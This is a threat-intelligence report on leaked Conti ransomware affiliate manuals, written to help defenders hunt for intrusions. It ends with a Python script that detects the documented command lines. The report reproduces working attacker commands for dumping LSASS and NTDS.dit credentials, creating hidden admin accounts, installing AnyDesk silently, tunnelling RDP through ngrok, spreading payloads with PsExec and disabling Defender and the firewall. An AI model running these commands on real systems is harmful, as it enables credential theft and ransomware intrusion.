Believed active since mid-2020, Conti is a 'big game hunter' ransomware threat operated by a threat group identified as Wizard Spider and offered to affiliates as a ransomware-as-a-service (RaaS) offering.
Following the lead of other big game hunter ransomware groups, Conti adopted the double extortion tactic, also known as 'steal, encrypt and leak', in order to apply additional pressure on victims to pay their ransom demands and avoid sensitive or confidential data being exposed.
Conti is infamously responsible for a large-scale ransomware attack on the Irish Health Service Executive (HSE). On August 5, 2021, a disgruntled Conti affiliate leaked an archive containing the internal 'manuals and software' utilized by the group to a popular Russian-language cybercrime forum (Figure 1/Figure 2).
Figure 1 - Forum post detailing the Conti leak
Figure 2 - Google Translation (Russian to English)
The affiliate was seemingly upset at not receiving a cut of the profits. The leaked archive provides an insight into the tools, techniques and procedures (TTP) of the group and its affiliates, which are likely similar to the TTP utilized by other ransomware threat groups.
Later posts to this forum thread suggest that some attack tools were excluded from this leak, including a Mimikatz payload, described as evading antivirus solutions, and a 'stealer' payload used to acquire credentials from browsers.
Additionally, the affiliate claims to hold information pertaining to the development of targets and a list of 'teams' although it is not clear if this list would expose high-ranking members of the Conti/Wizard Spider threat group.
Having reviewed this leak archive, the content appears authentic and, as such, the TTP are likely to be in current use by Conti as well as potentially other ransomware groups using similar methods.
This report provides a summary of indicators of compromise (IOC) identified from this analysis to allow defenders an opportunity to hunt for these threats within their organization's network as well as proactively block or identify future intrusion attempts.
Payloads & Tools
Whilst some of the tools utilized by Conti are 'legitimate' commercial or open-source offerings, their unexpected presence and/or execution on an organization's network may be indicative of nefarious use and should be investigated.
AdFind is a free Active Directory (AD) query tool used to gather information such as hosts and users from the target network, likely during the threat actor's reconnaissance phase.
Aside from identifying additional hosts to target, the threat actor will attempt to determine high-value users from the information acquired using AdFind.
Specifically, documentation within the leak reveals that Conti classifies users as either 'Junior', 'Medium' or 'Senior', with the group obviously seeking to identify the higher-privileged 'Senior' accounts. Furthermore, suggested departments of interest include those mentioning 'Administration', 'IT' and/or 'LAN Engineering'.
In addition to the use of AdFind, which does not necessarily require administrative privileges to execute, the group will also use native commands such as:
NET GROUP "DOMAIN ADMINS" /DOMAIN
Notably, execution of the backup.bat script results in the following text files, containing AD information from a victim network, being created:
Additional scripts are also included within the leak, with script.sh seemingly being used to parse AdFind results:
The output of this additional script includes the following text files:
Whilst a script named p.bat may be used to 'ping' discovered hosts to determine if they are online:
Notably, this script will read the content of domains.txt and output results to
Antivirus Removal Tools
Albeit contained within a password-protected 7zip archive, a number of executables and scripts are seemingly provided to remove endpoint security solutions:
- Bitdefender 2019 Editions
- Trend Micro: trendmicro pass AV remove.bat
- Sophos
Additionally, this archive includes rootkit removal tools, potentially used to prevent third-party rootkits from impacting the group's activity:
- GMER Rootkit Detector and Remover
- Epoolsoft PC Hunter
- PowerTool Antivirus & Rootkit Tool
Whilst specific file hashes for the above files cannot be determined from the encrypted archive, those deploying the tools may drop the entire archive onto a target host:
AV.7z
Cobalt Strike is a legitimate commercial tool, often used by red teams, that provides a post-exploitation implant named 'Beacon'.
Typically delivered and reflectively loaded into the memory of an injected Windows process following the exploitation of some vulnerability, Cobalt Strike evades detection and provides numerous capabilities to a threat actor including command execution, file transfer, keylogging, Mimikatz credential gathering, port scanning, privilege escalation and SOCKS proxying.
Command and control (C2) communications utilize common protocols, including HTTP, HTTPS and DNS, likely to avoid anomaly detection by appearing alongside other legitimate network communications and, once deployed, the Beacon will attempt to periodically call home to a preconfigured C2 server.
The main Cobalt Strike archive includes the following files, many of which may also identify the presence of earlier versions of Cobalt Strike:
Additionally, a Cobalt Strike script used to query the Windows Registry for signs of antivirus software being installed may also be deployed:
C2 IP Addresses
Based on screenshots shared by the rogue affiliate, the following IP addresses were potentially previously used as Cobalt Strike command and control (C2) infrastructure:
Kerberoast is a Kerberos attack technique that allows an unprivileged user to gain access to service accounts by cracking NTLM hashes acquired from ticket-granting tickets (TGT) in memory. Brute-forcing these NTLM hashes can reveal a plaintext password, leading to privilege escalation.
In this instance, a PowerShell script from the Empire Project has been deployed for 'Kerberoasting'.
Proxifier is a commercial tool that allows non-proxy aware applications to proxy their network traffic through a SOCKS or HTTPS proxy.
Rclone is a legitimate open source tool used to synchronize and manage data on local, cloud and virtual file systems, seemingly used by the group for data exfiltration via the Mega.nz cloud storage platform.
Instructions provided to the affiliate detail how to copy data from victim hosts to a Mega cloud storage account and detail the use of a PowerShell script to process multiple network shares.
Launching the PowerShell script rclonemanager.ps1 reads a list of network shares from a file named 2load.txt and passes them to Rclone, which is executed in multi-threaded mode. Additionally, the configuration file rclone.conf contains credentials for a threat actor controlled Mega account into which the data is uploaded.
Router Scan by Stas'M is a network audit tool used to identify devices and, using various exploits, gather data from network infrastructure devices.
Given the use of exploits, endpoint security solutions will likely identify this tool as malicious.
In addition to the identified binaries, 'manuals' within this leak identify the use of numerous native Windows and third-party tools. As such, the unexpected execution of the following commands may be indicative of nefarious activity.
A manual within the leak suggests the use of the commercial remote access tool AnyDesk, presumably as an additional method of remote access, allowing the threat actor to browse the file system of victim hosts as well as potentially deliver additional payloads and/or exfiltrate data.
To simplify the use of AnyDesk, an example PowerShell script is provided that downloads the AnyDesk executable to C:\ProgramData\AnyDesk (Figure 3).
Figure 3 - Example PowerShell script used to download AnyDesk
Once downloaded, AnyDesk is then silently installed and an access password configured:
cmd.exe /c C:\ProgramData\AnyDesk.exe --install C:\ProgramData\AnyDesk --start-with-win --silent
cmd.exe /c echo J9kzQ2Y0qO | C:\ProgramData\anydesk.exe --set-password
As observed in the group's Remote Desktop configuration, an additional administrator account may also be configured, albeit likely using different values, and hidden from the login screen by creating or modifying the account's entry under the Winlogon SpecialAccounts\Userlist registry key:
net user oldadministrator "qc69t4B#Z0kE3" /add
net localgroup Administrators oldadministrator /ADD
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v oldadministrator /t REG_DWORD /d 0 /f
Finally, AnyDesk is executed with the --get-id parameter, which returns the identifier the threat actor requires to gain remote access:
cmd.exe /c C:\ProgramData\AnyDesk.exe --get-id
Conti Encryption Tool
Whilst the actual encryption tool is not included within the leak, documentation for the Linux version, potentially named encryptor, provides details of the tool's options, including VMware ESXi capabilities:
- Encrypts files on the specified path. This parameter is mandatory; nothing is encrypted without it.
- Kills all processes that interfere with file open operations.
- Logs all activity including errors.
- Turns off all VMware ESXi virtual machines.
- Used with the --vmkiller option, specifies VMware ESXi virtual machines that will not be turned off.
- Used with the
- Detaches the encryption process from the current terminal session so that it continues to run should the session fail.
As detailed in the rogue affiliate's forum post, the Mimikatz attack tool was excluded from this leak although details of the group's credential dumping methods are within the leaked manuals.
Specifically, the following commands are given as methods for creating a memory dump of the Local Security Authority Subsystem Service (LSASS) for later analysis and credential theft:
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump PID C:\ProgramData\lsass.dmp full
wmic /node:[target] process call create "cmd /c rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump PID C:\ProgramData\lsass.dmp full"
remote-exec psexec [target] cmd /c rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump PID C:\ProgramData\lsass.dmp full
Whilst not present within this leak, SoftPerfect Network Scanner is a commercial network administration tool available for both macOS and Windows.
Based on the manuals within this leak, this tool is used to gather information on hosts within a target network:
netscan.exe /hide /auto:"result.xml" /config:netscan.xml /range:192.168.0.1-192.168.1.255
It is likely that this tool would be deployed in its 'portable' format, rather than installed, along with the above specified XML files. As such, the following files may be present:
Widely used by developers, ngrok is a legitimate service that allows the creation of secure tunnels providing remote access to hosts within private networks, such as those behind firewalls and/or Network Address Translation (NAT).
Assuming the 'free plan' is used, execution of ngrok on a target host results in a randomly generated temporary ngrok.io address being created to allow remote access via a secure HTTP/TCP tunnel.
Aside from nefarious use by threat actors, unauthorized tunnels should be discouraged given that they can bypass security controls and increase the attack surface of the organization.
In this instance, ngrok is used by the threat actor to simplify access to Remote Desktop services on Windows hosts, as determined by TCP port 3389, although in practice these parameters may vary:
ngrok authtoken 1vZgA1BbLWyhSjIE0f36QG6derd_5fXEPgPp8ZLxbUg
ngrok tcp 3389
The NT Directory Services Directory Information Tree file, located in %WINDOWS%\NTDS.dit, acts as a database for Active Directory and contains valuable data including credentials.
As such, threat actors seeking to elevate their privileges within a network will attempt to acquire this file, although it is locked by default.
To work around this issue, Conti detail the use of the Windows Management Instrumentation command-line utility (WMIC) and the Volume Shadow Copy Service (VSS) administrative tool, vssadmin, to create a Volume Shadow Copy of the system:
wmic /node:"DC01" /user:"DOMAIN\admin" /password:"cleartextpass" process call create "cmd /c vssadmin list shadows >> c:\log.txt"
net start "Volume Shadow Copy"
wmic /node:"DC01" /user:"DOMAIN\admin" /password:"cleartextpass" process call create "cmd /c vssadmin create shadow /for=C: 2>&1"
Having created the shadow copy, the NTDS file and the potentially sensitive Windows Registry hive files can be copied to another location for exfiltration:
wmic /node:"DC01" /user:"DOMAIN\admin" /password:"cleartextpass" process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\NTDS\NTDS.dit c:\temp\log\ & copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\System32\config\SYSTEM c:\temp\log\ & copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\System32\config\SECURITY c:\temp\log\"
The HarddiskVolumeShadowCopyXX number will differ based on the number of shadow copies present on the target host.
Subsequently, the guide recommends the creation of an encrypted archive containing these files, likely as these may prove useful in later intrusions:
7za.exe a -tzip -mx5 \\<DOMAIN_CONTROLLER>\C$\temp\log.zip \\DC01\C$\temp\log -pTOPSECRETPASSWORD
Finally, given that the NTDS file was open during the backup process, the Extensible Storage Engine (ESE) utility is executed to repair any potential corruption:
Esentutl /p C:\log\ntds.dit
Notably, the tool used to extract credentials from the NTDS file is not specified.
To allow a payload to be copied across a victim network, manuals within this leak detail the use of the legitimate Microsoft Sysinternals tool PsExec, used to execute programs on remote hosts, along with the suggested use of batch scripts:
PsExec.exe /accepteula @C:\share$\comps1.txt -u DOMAIN\ADMINISTRATOR -p PASSWORD cmd /c COPY "\\<DOMAIN_CONTROLLER>\share$\fx166.exe" "C:\windows\temp\"
- Uses PsExec to execute the COPY command on each of the hosts specified in the file C:\share$\comps1.txt, resulting in the payload fx166.exe being copied from the specified domain controller to each host's temporary directory.
PsExec.exe -d @C:\share$\comps1.txt -u DOMAIN\ADMINISTRATOR -p PASSWORD cmd /c c:\windows\temp\fx166.exe
- Uses PsExec to remotely execute the copied executable payload, fx166.exe, on each of the hosts specified in the file C:\share$\comps1.txt.
Alternatively, the Windows Management Instrumentation command-line utility (WMIC) can be used to achieve the same outcome, along with the Background Intelligent Transfer Service administrative tool (bitsadmin) to deliver the executable payload:
wmic /node:@C:\share$\comps1.txt /user:"DOMAIN\Administrator" /password:"PASSWORD" process call create "cmd.exe /c bitsadmin /transfer fx166 \\<DOMAIN_CONTROLLER>\share$\fx166.exe %APPDATA%\fx166.exe&%APPDATA%\fx166.exe"
Using the native Windows Registry command line utility, reg.exe, Remote Desktop is enabled by creating or overwriting the fDenyTSConnections value with 0:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
Additionally, Remote Assistance is enabled by creating or overwriting the fAllowToGetHelp value with 1:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
Having made the Windows Registry changes, the Windows Firewall is reconfigured using the Network Shell utility, netsh, to enable Remote Desktop traffic:
netsh Advfirewall set allprofiles state off
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
netsh firewall set service type = remotedesktop mode = enable
Presumably for use if the standard Remote Desktop port is blocked, the following PowerShell commands are provided to reconfigure the Windows Firewall, update the Remote Desktop port and then restart the Remote Desktop service, either preceded by powershell.exe or directly executed within a PowerShell console:
New-NetFirewallRule -DisplayName "New RDP Port 1350" -Direction Inbound -LocalPort 1350 -Protocol TCP -Action allow
New-NetFirewallRule -DisplayName "New RDP Port 1350" -Direction Inbound -LocalPort 1350 -Protocol UDP -Action allow
Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" -Name PortNumber -Value 1350
Restart-Service termservice -force
Finally, the threat actor may create an additional administrative user using the net management command, albeit the username and password may vary in practice:
net user Admin Password1 /add
net localgroup Administrators Admin /add
Presumably used as part of a reconnaissance phase, the legitimate Microsoft SQL command-line utility is used to query any databases present on a host and then potentially dump data from them to file.
As such, any unexpected execution of sqlcmd.exe on a Microsoft SQL server should be reviewed, for example:
sqlcmd.exe -S localhost -Q "select loginame, hostname from sys.sysprocesses"
sqlcmd.exe -S localhost -E -Q "SELECT name FROM master.dbo.sysdatabases;"
As is common with many threat actors, the Windows Task Scheduler utility, schtasks.exe, can be abused to launch processes using the permissions of a user account specified by the /RU parameter on a remote IP address or hostname specified by the /s parameter.
Based on the examples observed within this leak, suspicious usage includes tasks that are created, started immediately using the /run parameter and deleted in quick succession, for example:
SCHTASKS /s <IP|HOSTNAME> /RU "SYSTEM" /create /tn "WindowsSensor15" /tr "cmd.exe /c C:\ProgramData\P32.exe" /sc ONCE /sd 01/01/1970 /st 00:00
SCHTASKS /s <IP|HOSTNAME> /run /TN "WindowsSensor15"
schtasks /S <IP|HOSTNAME> /TN "WindowsSensor15" /DELETE /F
It is also likely that both the executable name and path would vary, along with the task name as specified by the /tn parameter.
As is common with many ransomware campaigns, and likely used in addition to the antivirus removal tools, Windows Defender is disabled via PowerShell, either preceded by powershell.exe or directly executed within a PowerShell console:
Set-MpPreference -DisableRealtimeMonitoring $true
Whilst not explicitly mentioned in this leak, the following PowerShell commands are often used by threat actors to further reduce the effectiveness of Windows Defender:
- Disable the Intrusion Prevention System (IPS), used to protect against the exploitation of known vulnerabilities:
Set-MpPreference -DisableIntrusionPreventionSystem $true
- Prevent downloaded files and attachments from being scanned:
Set-MpPreference -DisableIOAVProtection $true
- Disable the scanning of scripts:
Set-MpPreference -DisableScriptScanning $true
- Disable ransomware protection:
Set-MpPreference -EnableControlledFolderAccess Disabled
- Prevent malicious samples from being shared with Microsoft:
Set-MpPreference -MAPSReporting Disabled
Set-MpPreference -SubmitSamplesConsent NeverSend
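As an added example (not code from this report or from the leaked archive), the following Python triage script turns the command lines documented above into detection rules: the comsvcs.dll LSASS dump, the NTDS.dit copy from a shadow copy, the fDenyTSConnections and SpecialAccounts\Userlist registry changes, the unattended AnyDesk setup, the Domain Admins enumeration, the PsExec/bitsadmin spreading and the Set-MpPreference tampering, plus the create/run/delete scheduled-task sequence completing on one host within a short window. The event tuple format, host names, process IDs and the ten-minute window are assumptions, and the sample events are constructed in the shape of process-creation records rather than taken from a real incident.

```python
import re
from datetime import datetime, timedelta

# Single-line rules as (label, regex) pairs, each derived from a command quoted in this report.
RULES = [
    ("lsass_minidump_comsvcs", r"comsvcs\.dll,?\s*minidump"),
    ("ntds_from_shadow_copy", r"harddiskvolumeshadowcopy\d+\\windows\\ntds\\ntds\.dit"),
    ("defender_tampering", r"set-mppreference\s+-(disablerealtimemonitoring|disableintrusionpreventionsystem|"
                           r"disableioavprotection|disablescriptscanning|enablecontrolledfolderaccess|"
                           r"mapsreporting|submitsamplesconsent)\s+(\$true|disabled|neversend)"),
    ("rdp_enabled_via_registry", r"fdenytsconnections\s+/t\s+reg_dword\s+/d\s+0"),
    ("hidden_local_account", r"specialaccounts\\userlist\"?\s+/v\s+\S+\s+/t\s+reg_dword\s+/d\s+0"),
    ("anydesk_unattended_setup", r"anydesk\.exe\s+--(install|set-password|get-id)"),
    ("domain_admins_enumeration", r"net\s+group\s+\"domain admins\"\s+/domain"),
    ("psexec_or_bitsadmin_spread", r"psexec\.exe\s+(-d|/accepteula)\s+@|bitsadmin\s+/transfer"),
]
COMPILED = [(label, re.compile(rx, re.IGNORECASE)) for label, rx in RULES]
SCHTASKS = re.compile(r"\bschtasks(\.exe)?\b", re.IGNORECASE)
TASK_NAME = re.compile(r"/tn\s+\"?([^\"\s]+)\"?", re.IGNORECASE)
TASK_ACTION = re.compile(r"/(create|run|delete)\b", re.IGNORECASE)

def match_rules(cmdline):
    """Return the labels of every single-line rule that fires on one command line."""
    return [label for label, rx in COMPILED if rx.search(cmdline)]

def schtasks_lifecycle(events, window=timedelta(minutes=10)):
    """Flag a scheduled task that is created, run and deleted on the same host within `window`."""
    seen = {}  # (host, lower-cased task name) -> {action: timestamp}
    hits = []
    for ts, host, cmd in events:
        action, task = TASK_ACTION.search(cmd), TASK_NAME.search(cmd)
        if not (SCHTASKS.search(cmd) and action and task):
            continue
        stamps = seen.setdefault((host, task.group(1).lower()), {})
        stamps[action.group(1).lower()] = ts
        if all(a in stamps for a in ("create", "run", "delete")):
            span = max(stamps.values()) - min(stamps.values())
            if span <= window:
                hits.append((host, task.group(1), span.total_seconds()))
    return hits

def triage(events, window=timedelta(minutes=10)):
    """Run both checks over (ISO timestamp, host, command line) tuples and return the findings."""
    parsed = [(datetime.fromisoformat(ts), host, cmd) for ts, host, cmd in events]
    line_hits = [(host, label) for _, host, cmd in parsed for label in match_rules(cmd)]
    return {"line_hits": line_hits, "schtasks_lifecycle": schtasks_lifecycle(parsed, window)}

# Constructed sample events in the shape of process-creation records; not taken from the leak.
SAMPLE_EVENTS = [
    ("2021-08-05T10:00:01", "WS01", 'net group "Domain Admins" /domain'),
    ("2021-08-05T10:02:13", "WS01", r"rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 712 C:\ProgramData\lsass.dmp full"),
    ("2021-08-05T10:05:40", "DC01", r"cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Windows\NTDS\NTDS.dit c:\temp\log"),
    ("2021-08-05T10:07:00", "WS02", r'SCHTASKS /s WS02 /RU "SYSTEM" /create /tn "WindowsSensor15" /tr "cmd.exe /c C:\ProgramData\P32.exe" /sc ONCE /sd 01/01/1970 /st 00:00'),
    ("2021-08-05T10:07:02", "WS02", 'SCHTASKS /s WS02 /run /TN "WindowsSensor15"'),
    ("2021-08-05T10:07:09", "WS02", 'schtasks /S WS02 /TN "WindowsSensor15" /DELETE /F'),
    ("2021-08-05T10:09:30", "WS02", "powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true"),
    ("2021-08-05T10:11:00", "WS03", r'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'),
    ("2021-08-06T09:00:00", "WS04", 'schtasks /create /tn "NightlyBackup" /tr backup.exe /sc daily'),
]
```

Calling triage(SAMPLE_EVENTS) yields five single-line hits and one short-lived task (WindowsSensor15 on WS02, created, run and deleted within nine seconds), while the lone /create on WS04 is not flagged.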